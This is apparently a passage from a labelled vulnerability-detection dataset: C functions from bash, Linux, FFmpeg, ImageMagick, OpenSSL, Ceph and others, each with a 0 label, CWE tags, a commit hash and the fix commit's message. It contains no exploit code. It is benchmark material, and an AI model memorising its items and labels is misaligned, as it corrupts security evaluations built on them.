if (matches == 0 && perform_hostname_completion && *text == '@')
matches = rl_completion_matches (text, hostname_completion_function);
/* And last, (but not least) if this word is in a command position, then
complete over possible command names, including aliases, functions,
and command names. */
if (matches == 0 && (compflags & DEFCOMP_CMDPOS))
{
/* If END == START and text[0] == 0, we are trying to complete an empty
command word. */
if (no_empty_command_completion && end == start && text[0] == '\0')
{
matches = (char **)NULL;
rl_ignore_some_completions_function = bash_ignore_everything;
}
else
{
#define CMD_IS_DIR(x) (absolute_pathname(x) == 0 && absolute_program(x) == 0 && *(x) != '~' && test_for_directory (x))
dot_in_path = 0;
matches = rl_completion_matches (text, command_word_completion_function);
/* If we are attempting command completion and nothing matches, we
do not want readline to perform filename completion for us. We
still want to be able to complete partial pathnames, so set the
completion ignore function to something which will remove
filenames and leave directories in the match list. */
if (matches == (char **)NULL)
rl_ignore_some_completions_function = bash_ignore_filenames;
else if (matches[1] == 0 && CMD_IS_DIR(matches[0]) && dot_in_path == 0)
/* If we found a single match, without looking in the current
directory (because it's not in $PATH), but the found name is
also a command in the current directory, suppress appending any
terminating character, since it's ambiguous. */
{
rl_completion_suppress_append = 1;
rl_filename_completion_desired = 0;
}
else if (matches[0] && matches[1] && STREQ (matches[0], matches[1]) && CMD_IS_DIR (matches[0]))
/* There are multiple instances of the same match (duplicate
completions haven't yet been removed). In this case, all of
the matches will be the same, and the duplicate removal code
will distill them all down to one. We turn on
rl_completion_suppress_append for the same reason as above.
Remember: we only care if there's eventually a single unique
completion. If there are multiple completions this won't
make a difference and the problem won't occur. */
{
rl_completion_suppress_append = 1;
rl_filename_completion_desired = 0;
}
}
}
/* This could be a globbing pattern, so try to expand it using pathname
expansion. */
if (!matches && glob_pattern_p (text))
{
matches = rl_completion_matches (text, glob_complete_word);
/* A glob expression that matches more than one filename is problematic.
If we match more than one filename, punt. */
if (matches && matches[1] && rl_completion_type == TAB)
{
strvec_dispose (matches);
matches = (char **)0;
}
else if (matches && matches[1] && rl_completion_type == '!')
{
rl_completion_suppress_append = 1;
rl_filename_completion_desired = 0;
}
}
return (matches);
}
| 0 |
[
"CWE-20"
] |
bash
|
4f747edc625815f449048579f6e65869914dd715
| 306,731,397,501,749,000,000,000,000,000,000,000,000 | 116 |
Bash-4.4 patch 7
|
static int journal_unmap_buffer(journal_t *journal, struct buffer_head *bh,
int partial_page)
{
transaction_t *transaction;
struct journal_head *jh;
int may_free = 1;
BUFFER_TRACE(bh, "entry");
/*
* It is safe to proceed here without the j_list_lock because the
* buffers cannot be stolen by try_to_free_buffers as long as we are
* holding the page lock. --sct
*/
jh = jbd2_journal_grab_journal_head(bh);
if (!jh)
goto zap_buffer_unlocked;
/* OK, we have data buffer in journaled mode */
write_lock(&journal->j_state_lock);
spin_lock(&jh->b_state_lock);
spin_lock(&journal->j_list_lock);
/*
* We cannot remove the buffer from checkpoint lists until the
* transaction adding inode to orphan list (let's call it T)
* is committed. Otherwise if the transaction changing the
* buffer would be cleaned from the journal before T is
* committed, a crash will cause that the correct contents of
* the buffer will be lost. On the other hand we have to
* clear the buffer dirty bit at latest at the moment when the
* transaction marking the buffer as freed in the filesystem
* structures is committed because from that moment on the
* block can be reallocated and used by a different page.
* Since the block hasn't been freed yet but the inode has
* already been added to orphan list, it is safe for us to add
* the buffer to BJ_Forget list of the newest transaction.
*
* Also we have to clear buffer_mapped flag of a truncated buffer
* because the buffer_head may be attached to the page straddling
* i_size (can happen only when blocksize < pagesize) and thus the
* buffer_head can be reused when the file is extended again. So we end
* up keeping around invalidated buffers attached to transactions'
* BJ_Forget list just to stop checkpointing code from cleaning up
* the transaction this buffer was modified in.
*/
transaction = jh->b_transaction;
if (transaction == NULL) {
/* First case: not on any transaction. If it
* has no checkpoint link, then we can zap it:
* it's a writeback-mode buffer so we don't care
* if it hits disk safely. */
if (!jh->b_cp_transaction) {
JBUFFER_TRACE(jh, "not on any transaction: zap");
goto zap_buffer;
}
if (!buffer_dirty(bh)) {
/* bdflush has written it. We can drop it now */
__jbd2_journal_remove_checkpoint(jh);
goto zap_buffer;
}
/* OK, it must be in the journal but still not
* written fully to disk: it's metadata or
* journaled data... */
if (journal->j_running_transaction) {
/* ... and once the current transaction has
* committed, the buffer won't be needed any
* longer. */
JBUFFER_TRACE(jh, "checkpointed: add to BJ_Forget");
may_free = __dispose_buffer(jh,
journal->j_running_transaction);
goto zap_buffer;
} else {
/* There is no currently-running transaction. So the
* orphan record which we wrote for this file must have
* passed into commit. We must attach this buffer to
* the committing transaction, if it exists. */
if (journal->j_committing_transaction) {
JBUFFER_TRACE(jh, "give to committing trans");
may_free = __dispose_buffer(jh,
journal->j_committing_transaction);
goto zap_buffer;
} else {
/* The orphan record's transaction has
* committed. We can cleanse this buffer */
clear_buffer_jbddirty(bh);
__jbd2_journal_remove_checkpoint(jh);
goto zap_buffer;
}
}
} else if (transaction == journal->j_committing_transaction) {
JBUFFER_TRACE(jh, "on committing transaction");
/*
* The buffer is committing, we simply cannot touch
* it. If the page is straddling i_size we have to wait
* for commit and try again.
*/
if (partial_page) {
spin_unlock(&journal->j_list_lock);
spin_unlock(&jh->b_state_lock);
write_unlock(&journal->j_state_lock);
jbd2_journal_put_journal_head(jh);
return -EBUSY;
}
/*
* OK, buffer won't be reachable after truncate. We just clear
* b_modified to not confuse transaction credit accounting, and
* set j_next_transaction to the running transaction (if there
* is one) and mark buffer as freed so that commit code knows
* it should clear dirty bits when it is done with the buffer.
*/
set_buffer_freed(bh);
if (journal->j_running_transaction && buffer_jbddirty(bh))
jh->b_next_transaction = journal->j_running_transaction;
jh->b_modified = 0;
spin_unlock(&journal->j_list_lock);
spin_unlock(&jh->b_state_lock);
write_unlock(&journal->j_state_lock);
jbd2_journal_put_journal_head(jh);
return 0;
} else {
/* Good, the buffer belongs to the running transaction.
* We are writing our own transaction's data, not any
* previous one's, so it is safe to throw it away
* (remember that we expect the filesystem to have set
* i_size already for this truncate so recovery will not
* expose the disk blocks we are discarding here.) */
J_ASSERT_JH(jh, transaction == journal->j_running_transaction);
JBUFFER_TRACE(jh, "on running transaction");
may_free = __dispose_buffer(jh, transaction);
}
zap_buffer:
/*
* This is tricky. Although the buffer is truncated, it may be reused
* if blocksize < pagesize and it is attached to the page straddling
* EOF. Since the buffer might have been added to BJ_Forget list of the
* running transaction, journal_get_write_access() won't clear
* b_modified and credit accounting gets confused. So clear b_modified
* here.
*/
jh->b_modified = 0;
spin_unlock(&journal->j_list_lock);
spin_unlock(&jh->b_state_lock);
write_unlock(&journal->j_state_lock);
jbd2_journal_put_journal_head(jh);
zap_buffer_unlocked:
clear_buffer_dirty(bh);
J_ASSERT_BH(bh, !buffer_jbddirty(bh));
clear_buffer_mapped(bh);
clear_buffer_req(bh);
clear_buffer_new(bh);
clear_buffer_delay(bh);
clear_buffer_unwritten(bh);
bh->b_bdev = NULL;
return may_free;
}
| 0 |
[
"CWE-416"
] |
linux
|
cc16eecae687912238ee6efbff71ad31e2bc414e
| 191,878,371,301,700,050,000,000,000,000,000,000,000 | 161 |
jbd2: fix use-after-free of transaction_t race
jbd2_journal_wait_updates() is called with j_state_lock held. But if
there is a commit in progress, then this transaction might get committed
and freed via jbd2_journal_commit_transaction() ->
jbd2_journal_free_transaction(), when we release j_state_lock.
So check for journal->j_running_transaction every time we release and
re-acquire j_state_lock to avoid a use-after-free issue.
Link: https://lore.kernel.org/r/948c2fed518ae739db6a8f7f83f1d58b504f87d0.1644497105.git.ritesh.list@gmail.com
Fixes: 4f98186848707f53 ("jbd2: refactor wait logic for transaction updates into a common function")
Cc: [email protected]
Reported-and-tested-by: [email protected]
Reviewed-by: Jan Kara <[email protected]>
Signed-off-by: Ritesh Harjani <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
|
static void add_pixels8_c(uint8_t *av_restrict pixels,
int16_t *block,
int line_size)
{
int i;
for(i=0;i<8;i++) {
pixels[0] += block[0];
pixels[1] += block[1];
pixels[2] += block[2];
pixels[3] += block[3];
pixels[4] += block[4];
pixels[5] += block[5];
pixels[6] += block[6];
pixels[7] += block[7];
pixels += line_size;
block += 8;
}
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
FFmpeg
|
454a11a1c9c686c78aa97954306fb63453299760
| 102,142,874,984,833,940,000,000,000,000,000,000,000 | 19 |
avcodec/dsputil: fix signedness in sizeof() comparissions
Signed-off-by: Michael Niedermayer <[email protected]>
|
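The signedness hazard the commit title refers to is easy to reproduce: sizeof() has type size_t, so comparing it against a signed length silently converts the signed side to unsigned, and a negative length sails past the bounds check. A self-contained demonstration:

#include <stdio.h>

struct header { char magic[4]; int version; };

int main(void)
{
    int len = -1;

    /* intended comparison: false, as expected */
    if (len >= (int)sizeof(struct header))
        puts("signed compare: accepted");

    /* what `len >= sizeof(struct header)` actually does: len is
     * converted to size_t, -1 becomes a huge value, check passes */
    if ((size_t)len >= sizeof(struct header))
        puts("unsigned compare: bogus accept");
    return 0;
}

The fix class is either to cast sizeof() to a signed type in the comparison or to reject negative lengths before comparing at all.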
MagickExport Image *SampleImage(const Image *image,const size_t columns,
const size_t rows,ExceptionInfo *exception)
{
#define SampleImageTag "Sample/Image"
CacheView
*image_view,
*sample_view;
Image
*sample_image;
MagickBooleanType
status;
MagickOffsetType
progress;
register ssize_t
x1;
ssize_t
*x_offset,
y;
PointInfo
sample_offset;
/*
Initialize sampled image attributes.
*/
assert(image != (const Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
if ((columns == 0) || (rows == 0))
ThrowImageException(ImageError,"NegativeOrZeroImageSize");
if ((columns == image->columns) && (rows == image->rows))
return(CloneImage(image,0,0,MagickTrue,exception));
sample_image=CloneImage(image,columns,rows,MagickTrue,exception);
if (sample_image == (Image *) NULL)
return((Image *) NULL);
/*
Set the sampling offset, default is in the mid-point of sample regions.
*/
sample_offset.x=sample_offset.y=0.5-MagickEpsilon;
{
const char
*value;
value=GetImageArtifact(image,"sample:offset");
if (value != (char *) NULL)
{
GeometryInfo
geometry_info;
MagickStatusType
flags;
flags=ParseGeometry(value,&geometry_info);
sample_offset.x=sample_offset.y=geometry_info.rho/100.0-MagickEpsilon;
if ((flags & SigmaValue) != 0)
sample_offset.y=geometry_info.sigma/100.0-MagickEpsilon;
}
}
/*
Allocate scan line buffer and column offset buffers.
*/
x_offset=(ssize_t *) AcquireQuantumMemory((size_t) sample_image->columns,
sizeof(*x_offset));
if (x_offset == (ssize_t *) NULL)
{
sample_image=DestroyImage(sample_image);
ThrowImageException(ResourceLimitError,"MemoryAllocationFailed");
}
for (x1=0; x1 < (ssize_t) sample_image->columns; x1++)
x_offset[x1]=(ssize_t) ((((double) x1+sample_offset.x)*image->columns)/
sample_image->columns);
/*
Sample each row.
*/
status=MagickTrue;
progress=0;
image_view=AcquireVirtualCacheView(image,exception);
sample_view=AcquireAuthenticCacheView(sample_image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,sample_image,sample_image->rows,1)
#endif
for (y=0; y < (ssize_t) sample_image->rows; y++)
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
y_offset;
if (status == MagickFalse)
continue;
y_offset=(ssize_t) ((((double) y+sample_offset.y)*image->rows)/
sample_image->rows);
p=GetCacheViewVirtualPixels(image_view,0,y_offset,image->columns,1,
exception);
q=QueueCacheViewAuthenticPixels(sample_view,0,y,sample_image->columns,1,
exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
/*
Sample each column.
*/
for (x=0; x < (ssize_t) sample_image->columns; x++)
{
register ssize_t
i;
if (GetPixelWriteMask(sample_image,q) <= (QuantumRange/2))
{
q+=GetPixelChannels(sample_image);
continue;
}
for (i=0; i < (ssize_t) GetPixelChannels(sample_image); i++)
{
PixelChannel
channel;
PixelTrait
image_traits,
traits;
channel=GetPixelChannelChannel(sample_image,i);
traits=GetPixelChannelTraits(sample_image,channel);
image_traits=GetPixelChannelTraits(image,channel);
if ((traits == UndefinedPixelTrait) ||
(image_traits == UndefinedPixelTrait))
continue;
SetPixelChannel(sample_image,channel,p[x_offset[x]*GetPixelChannels(
image)+i],q);
}
q+=GetPixelChannels(sample_image);
}
if (SyncCacheViewAuthenticPixels(sample_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,SampleImageTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
sample_view=DestroyCacheView(sample_view);
x_offset=(ssize_t *) RelinquishMagickMemory(x_offset);
sample_image->type=image->type;
if (status == MagickFalse)
sample_image=DestroyImage(sample_image);
return(sample_image);
}
| 0 |
[
"CWE-369"
] |
ImageMagick
|
43539e67a47d2f8de832d33a5b26dc2a7a12294f
| 163,912,684,132,589,960,000,000,000,000,000,000,000 | 172 |
https://github.com/ImageMagick/ImageMagick/issues/1718
|
char *get_interface_name(int index)
{
struct ifreq ifr;
int sk, err;
if (index < 0)
return NULL;
sk = socket(PF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
if (sk < 0) {
perror("Open socket error");
return NULL;
}
memset(&ifr, 0, sizeof(ifr));
ifr.ifr_ifindex = index;
err = ioctl(sk, SIOCGIFNAME, &ifr);
if (err < 0) {
perror("Get interface name error");
close(sk);
return NULL;
}
close(sk);
return g_strdup(ifr.ifr_name);
}
| 0 |
[] |
connman
|
58d397ba74873384aee449690a9070bacd5676fa
| 95,917,689,038,780,250,000,000,000,000,000,000,000 | 28 |
gdhcp: Avoid reading invalid data in dhcp_get_option
|
static int check_revocation(X509_STORE_CTX *ctx)
{
int i = 0, last = 0, ok = 0;
if (!(ctx->param->flags & X509_V_FLAG_CRL_CHECK))
return 1;
if (ctx->param->flags & X509_V_FLAG_CRL_CHECK_ALL)
last = sk_X509_num(ctx->chain) - 1;
else {
/* If checking CRL paths this isn't the EE certificate */
if (ctx->parent)
return 1;
last = 0;
}
for (i = 0; i <= last; i++) {
ctx->error_depth = i;
ok = check_cert(ctx);
if (!ok)
return ok;
}
return 1;
}
| 0 |
[] |
openssl
|
33cc5dde478ba5ad79f8fd4acd8737f0e60e236e
| 95,159,220,083,980,590,000,000,000,000,000,000,000 | 21 |
Compat self-signed trust with reject-only aux data
When auxiliary data contains only reject entries, continue to trust
self-signed objects just as when no auxiliary data is present.
This makes it possible to reject specific uses without changing
what's accepted (and thus overriding the underlying EKU).
Added new supported certs and doubled test count from 38 to 76.
Reviewed-by: Dr. Stephen Henson <[email protected]>
|
bool freeze_workqueues_busy(void)
{
bool busy = false;
struct workqueue_struct *wq;
struct pool_workqueue *pwq;
mutex_lock(&wq_pool_mutex);
WARN_ON_ONCE(!workqueue_freezing);
list_for_each_entry(wq, &workqueues, list) {
if (!(wq->flags & WQ_FREEZABLE))
continue;
/*
* nr_active is monotonically decreasing. It's safe
* to peek without lock.
*/
rcu_read_lock_sched();
for_each_pwq(pwq, wq) {
WARN_ON_ONCE(pwq->nr_active < 0);
if (pwq->nr_active) {
busy = true;
rcu_read_unlock_sched();
goto out_unlock;
}
}
rcu_read_unlock_sched();
}
out_unlock:
mutex_unlock(&wq_pool_mutex);
return busy;
}
| 0 |
[
"CWE-200"
] |
tip
|
dfb4357da6ddbdf57d583ba64361c9d792b0e0b1
| 178,242,711,808,574,470,000,000,000,000,000,000,000 | 32 |
time: Remove CONFIG_TIMER_STATS
Currently CONFIG_TIMER_STATS exposes process information across namespaces:
kernel/time/timer_list.c print_timer():
SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
/proc/timer_list:
#11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
Given that the tracer can give the same information, this patch entirely
removes CONFIG_TIMER_STATS.
Suggested-by: Thomas Gleixner <[email protected]>
Signed-off-by: Kees Cook <[email protected]>
Acked-by: John Stultz <[email protected]>
Cc: Nicolas Pitre <[email protected]>
Cc: [email protected]
Cc: Lai Jiangshan <[email protected]>
Cc: Shuah Khan <[email protected]>
Cc: Xing Gao <[email protected]>
Cc: Jonathan Corbet <[email protected]>
Cc: Jessica Frazelle <[email protected]>
Cc: [email protected]
Cc: Nicolas Iooss <[email protected]>
Cc: "Paul E. McKenney" <[email protected]>
Cc: Petr Mladek <[email protected]>
Cc: Richard Cochran <[email protected]>
Cc: Tejun Heo <[email protected]>
Cc: Michal Marek <[email protected]>
Cc: Josh Poimboeuf <[email protected]>
Cc: Dmitry Vyukov <[email protected]>
Cc: Oleg Nesterov <[email protected]>
Cc: "Eric W. Biederman" <[email protected]>
Cc: Olof Johansson <[email protected]>
Cc: Andrew Morton <[email protected]>
Cc: [email protected]
Cc: Arjan van de Ven <[email protected]>
Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
Signed-off-by: Thomas Gleixner <[email protected]>
|
xfs_attr_set(
struct xfs_inode *dp,
const unsigned char *name,
unsigned char *value,
int valuelen,
int flags)
{
struct xfs_mount *mp = dp->i_mount;
struct xfs_buf *leaf_bp = NULL;
struct xfs_da_args args;
struct xfs_defer_ops dfops;
struct xfs_trans_res tres;
xfs_fsblock_t firstblock;
int rsvd = (flags & ATTR_ROOT) != 0;
int error, err2, local;
XFS_STATS_INC(mp, xs_attr_set);
if (XFS_FORCED_SHUTDOWN(dp->i_mount))
return -EIO;
error = xfs_attr_args_init(&args, dp, name, flags);
if (error)
return error;
args.value = value;
args.valuelen = valuelen;
args.firstblock = &firstblock;
args.dfops = &dfops;
args.op_flags = XFS_DA_OP_ADDNAME | XFS_DA_OP_OKNOENT;
args.total = xfs_attr_calc_size(&args, &local);
error = xfs_qm_dqattach(dp, 0);
if (error)
return error;
/*
* If the inode doesn't have an attribute fork, add one.
* (inode must not be locked when we call this routine)
*/
if (XFS_IFORK_Q(dp) == 0) {
int sf_size = sizeof(xfs_attr_sf_hdr_t) +
XFS_ATTR_SF_ENTSIZE_BYNAME(args.namelen, valuelen);
error = xfs_bmap_add_attrfork(dp, sf_size, rsvd);
if (error)
return error;
}
tres.tr_logres = M_RES(mp)->tr_attrsetm.tr_logres +
M_RES(mp)->tr_attrsetrt.tr_logres * args.total;
tres.tr_logcount = XFS_ATTRSET_LOG_COUNT;
tres.tr_logflags = XFS_TRANS_PERM_LOG_RES;
/*
* Root fork attributes can use reserved data blocks for this
* operation if necessary
*/
error = xfs_trans_alloc(mp, &tres, args.total, 0,
rsvd ? XFS_TRANS_RESERVE : 0, &args.trans);
if (error)
return error;
xfs_ilock(dp, XFS_ILOCK_EXCL);
error = xfs_trans_reserve_quota_nblks(args.trans, dp, args.total, 0,
rsvd ? XFS_QMOPT_RES_REGBLKS | XFS_QMOPT_FORCE_RES :
XFS_QMOPT_RES_REGBLKS);
if (error) {
xfs_iunlock(dp, XFS_ILOCK_EXCL);
xfs_trans_cancel(args.trans);
return error;
}
xfs_trans_ijoin(args.trans, dp, 0);
/*
* If the attribute list is non-existent or a shortform list,
* upgrade it to a single-leaf-block attribute list.
*/
if (dp->i_d.di_aformat == XFS_DINODE_FMT_LOCAL ||
(dp->i_d.di_aformat == XFS_DINODE_FMT_EXTENTS &&
dp->i_d.di_anextents == 0)) {
/*
* Build initial attribute list (if required).
*/
if (dp->i_d.di_aformat == XFS_DINODE_FMT_EXTENTS)
xfs_attr_shortform_create(&args);
/*
* Try to add the attr to the attribute list in
* the inode.
*/
error = xfs_attr_shortform_addname(&args);
if (error != -ENOSPC) {
/*
* Commit the shortform mods, and we're done.
* NOTE: this is also the error path (EEXIST, etc).
*/
ASSERT(args.trans != NULL);
/*
* If this is a synchronous mount, make sure that
* the transaction goes to disk before returning
* to the user.
*/
if (mp->m_flags & XFS_MOUNT_WSYNC)
xfs_trans_set_sync(args.trans);
if (!error && (flags & ATTR_KERNOTIME) == 0) {
xfs_trans_ichgtime(args.trans, dp,
XFS_ICHGTIME_CHG);
}
err2 = xfs_trans_commit(args.trans);
xfs_iunlock(dp, XFS_ILOCK_EXCL);
return error ? error : err2;
}
/*
* It won't fit in the shortform, transform to a leaf block.
* GROT: another possible req'mt for a double-split btree op.
*/
xfs_defer_init(args.dfops, args.firstblock);
error = xfs_attr_shortform_to_leaf(&args, &leaf_bp);
if (error)
goto out_defer_cancel;
/*
* Prevent the leaf buffer from being unlocked so that a
* concurrent AIL push cannot grab the half-baked leaf
* buffer and run into problems with the write verifier.
*/
xfs_trans_bhold(args.trans, leaf_bp);
xfs_defer_bjoin(args.dfops, leaf_bp);
xfs_defer_ijoin(args.dfops, dp);
error = xfs_defer_finish(&args.trans, args.dfops);
if (error)
goto out_defer_cancel;
/*
* Commit the leaf transformation. We'll need another (linked)
* transaction to add the new attribute to the leaf, which
* means that we have to hold & join the leaf buffer here too.
*/
error = xfs_trans_roll_inode(&args.trans, dp);
if (error)
goto out;
xfs_trans_bjoin(args.trans, leaf_bp);
leaf_bp = NULL;
}
if (xfs_bmap_one_block(dp, XFS_ATTR_FORK))
error = xfs_attr_leaf_addname(&args);
else
error = xfs_attr_node_addname(&args);
if (error)
goto out;
/*
* If this is a synchronous mount, make sure that the
* transaction goes to disk before returning to the user.
*/
if (mp->m_flags & XFS_MOUNT_WSYNC)
xfs_trans_set_sync(args.trans);
if ((flags & ATTR_KERNOTIME) == 0)
xfs_trans_ichgtime(args.trans, dp, XFS_ICHGTIME_CHG);
/*
* Commit the last in the sequence of transactions.
*/
xfs_trans_log_inode(args.trans, dp, XFS_ILOG_CORE);
error = xfs_trans_commit(args.trans);
xfs_iunlock(dp, XFS_ILOCK_EXCL);
return error;
out_defer_cancel:
xfs_defer_cancel(&dfops);
out:
if (leaf_bp)
xfs_trans_brelse(args.trans, leaf_bp);
if (args.trans)
xfs_trans_cancel(args.trans);
xfs_iunlock(dp, XFS_ILOCK_EXCL);
return error;
}
| 0 |
[
"CWE-241",
"CWE-754"
] |
linux
|
7b38460dc8e4eafba06c78f8e37099d3b34d473c
| 165,674,506,444,437,960,000,000,000,000,000,000,000 | 187 |
xfs: don't fail when converting shortform attr to long form during ATTR_REPLACE
Kanda Motohiro reported that expanding a tiny xattr into a large xattr
fails on XFS because we remove the tiny xattr from a shortform fork and
then try to re-add it after converting the fork to extents format,
without having cleared the ATTR_REPLACE flag. This fails because the attr is no
longer present, causing a fs shutdown.
This is derived from the patch in his bug report, but we really
shouldn't ignore a nonzero retval from the remove call.
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=199119
Reported-by: [email protected]
Reviewed-by: Dave Chinner <[email protected]>
Reviewed-by: Christoph Hellwig <[email protected]>
Signed-off-by: Darrick J. Wong <[email protected]>
|
void AES128GCM_OnWireTxHandler::reset_tx_handler(
std::initializer_list<std::uint32_t> update_size_sequence)
{
if (nonce == initial_nonce) {
if (used_initial_nonce) {
throw ceph::crypto::onwire::TxHandlerError("out of nonces");
}
used_initial_nonce = true;
}
if(1 != EVP_EncryptInit_ex(ectx.get(), nullptr, nullptr, nullptr,
reinterpret_cast<const unsigned char*>(&nonce))) {
throw std::runtime_error("EVP_EncryptInit_ex failed");
}
buffer.reserve(std::accumulate(std::begin(update_size_sequence),
std::end(update_size_sequence), AESGCM_TAG_LEN));
nonce.random_seq = nonce.random_seq + 1;
}
| 0 |
[
"CWE-323"
] |
ceph
|
dfd1d81cec62e21e21696dc87d4db5f920e51a67
| 159,294,792,468,414,920,000,000,000,000,000,000,000 | 20 |
msg/async/crypto_onwire: fix endianness of nonce_t
As a AES-GCM IV, nonce_t is implicitly shared between server and
client. Currently, if their endianness doesn't match, they are unable
to communicate in secure mode because each gets its own idea of what
the next nonce should be after the counter is incremented.
Several RFCs state that the nonce counter should be BE, but since we
use LE for everything on-disk and on-wire, make it LE.
Signed-off-by: Ilya Dryomov <[email protected]>
Reviewed-by: Radoslaw Zarzynski <[email protected]>
Reviewed-by: Sage Weil <[email protected]>
|
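The fix pins the nonce counter's byte order so both peers derive identical AES-GCM IVs regardless of host endianness. A hedged sketch of the underlying idea — hypothetical struct; byte-wise conversion is used instead of htole64() to stay portable:

#include <stdint.h>

/* Wire/IV layout defined explicitly as little-endian, independent of
 * the native byte order of either peer. */
struct nonce_le {
    uint8_t fixed[4];      /* random per-connection prefix */
    uint8_t counter[8];    /* 64-bit counter, stored LSB first */
};

static void nonce_store(struct nonce_le *n, uint64_t ctr)
{
    for (int i = 0; i < 8; i++)
        n->counter[i] = (uint8_t)(ctr >> (8 * i));
}

static uint64_t nonce_load(const struct nonce_le *n)
{
    uint64_t ctr = 0;
    for (int i = 7; i >= 0; i--)
        ctr = (ctr << 8) | n->counter[i];
    return ctr;
}

With this, "increment the nonce" is nonce_store(n, nonce_load(n) + 1) on both ends, and a big-endian server agrees with a little-endian client about what the next IV is.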
static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
{
struct packet_rollover *rollover = NULL;
struct packet_sock *po = pkt_sk(sk);
struct packet_fanout *f, *match;
u8 type = type_flags & 0xff;
u8 flags = type_flags >> 8;
int err;
switch (type) {
case PACKET_FANOUT_ROLLOVER:
if (type_flags & PACKET_FANOUT_FLAG_ROLLOVER)
return -EINVAL;
case PACKET_FANOUT_HASH:
case PACKET_FANOUT_LB:
case PACKET_FANOUT_CPU:
case PACKET_FANOUT_RND:
case PACKET_FANOUT_QM:
case PACKET_FANOUT_CBPF:
case PACKET_FANOUT_EBPF:
break;
default:
return -EINVAL;
}
mutex_lock(&fanout_mutex);
err = -EALREADY;
if (po->fanout)
goto out;
if (type == PACKET_FANOUT_ROLLOVER ||
(type_flags & PACKET_FANOUT_FLAG_ROLLOVER)) {
err = -ENOMEM;
rollover = kzalloc(sizeof(*rollover), GFP_KERNEL);
if (!rollover)
goto out;
atomic_long_set(&rollover->num, 0);
atomic_long_set(&rollover->num_huge, 0);
atomic_long_set(&rollover->num_failed, 0);
po->rollover = rollover;
}
if (type_flags & PACKET_FANOUT_FLAG_UNIQUEID) {
if (id != 0) {
err = -EINVAL;
goto out;
}
if (!fanout_find_new_id(sk, &id)) {
err = -ENOMEM;
goto out;
}
/* ephemeral flag for the first socket in the group: drop it */
flags &= ~(PACKET_FANOUT_FLAG_UNIQUEID >> 8);
}
match = NULL;
list_for_each_entry(f, &fanout_list, list) {
if (f->id == id &&
read_pnet(&f->net) == sock_net(sk)) {
match = f;
break;
}
}
err = -EINVAL;
if (match && match->flags != flags)
goto out;
if (!match) {
err = -ENOMEM;
match = kzalloc(sizeof(*match), GFP_KERNEL);
if (!match)
goto out;
write_pnet(&match->net, sock_net(sk));
match->id = id;
match->type = type;
match->flags = flags;
INIT_LIST_HEAD(&match->list);
spin_lock_init(&match->lock);
refcount_set(&match->sk_ref, 0);
fanout_init_data(match);
match->prot_hook.type = po->prot_hook.type;
match->prot_hook.dev = po->prot_hook.dev;
match->prot_hook.func = packet_rcv_fanout;
match->prot_hook.af_packet_priv = match;
match->prot_hook.id_match = match_fanout_group;
list_add(&match->list, &fanout_list);
}
err = -EINVAL;
spin_lock(&po->bind_lock);
if (po->running &&
match->type == type &&
match->prot_hook.type == po->prot_hook.type &&
match->prot_hook.dev == po->prot_hook.dev) {
err = -ENOSPC;
if (refcount_read(&match->sk_ref) < PACKET_FANOUT_MAX) {
__dev_remove_pack(&po->prot_hook);
po->fanout = match;
refcount_set(&match->sk_ref, refcount_read(&match->sk_ref) + 1);
__fanout_link(sk, po);
err = 0;
}
}
spin_unlock(&po->bind_lock);
if (err && !refcount_read(&match->sk_ref)) {
list_del(&match->list);
kfree(match);
}
out:
if (err && rollover) {
kfree(rollover);
po->rollover = NULL;
}
mutex_unlock(&fanout_mutex);
return err;
}
| 0 |
[
"CWE-362"
] |
linux
|
008ba2a13f2d04c947adc536d19debb8fe66f110
| 7,990,350,182,092,858,000,000,000,000,000,000,000 | 118 |
packet: hold bind lock when rebinding to fanout hook
Packet socket bind operations must hold the po->bind_lock. This keeps
po->running consistent with whether the socket is actually on a ptype
list to receive packets.
fanout_add unbinds a socket and its packet_rcv/tpacket_rcv call, then
binds the fanout object to receive through packet_rcv_fanout.
Make it hold the po->bind_lock when testing po->running and rebinding.
Else, it can race with other rebind operations, such as that in
packet_set_ring from packet_rcv to tpacket_rcv. Concurrent updates
can result in a socket being added to a fanout group twice, causing
use-after-free KASAN bug reports, among others.
Reported independently by both trinity and syzkaller.
Verified that the syzkaller reproducer passes after this patch.
Fixes: dc99f600698d ("packet: Add fanout support.")
Reported-by: nixioaming <[email protected]>
Signed-off-by: Willem de Bruijn <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
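The invariant the fix restores — po->running only changes under po->bind_lock, and so does the registration it describes — generalizes to any hook-swapping code. A hedged userspace model with hypothetical names:

#include <pthread.h>

struct hook { void (*func)(void); };

struct sock_state {
    pthread_mutex_t bind_lock;
    int running;               /* is `hook` currently registered? */
    struct hook hook;
};

/* Test the registration state and perform the unregister/re-register
 * pair under the same lock every other rebind path takes, so no path
 * can observe a half-switched state and register the hook twice. */
static void switch_hook(struct sock_state *po, void (*new_func)(void),
                        void (*unregister)(struct hook *),
                        void (*reg)(struct hook *))
{
    pthread_mutex_lock(&po->bind_lock);
    if (po->running) {
        unregister(&po->hook);
        po->hook.func = new_func;
        reg(&po->hook);
    } else {
        po->hook.func = new_func;  /* not registered: just swap */
    }
    pthread_mutex_unlock(&po->bind_lock);
}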
xsltCheckTopLevelElement(xsltStylesheetPtr style, xmlNodePtr inst, int err) {
xmlNodePtr parent;
if ((style == NULL) || (inst == NULL) || (inst->ns == NULL))
return(-1);
parent = inst->parent;
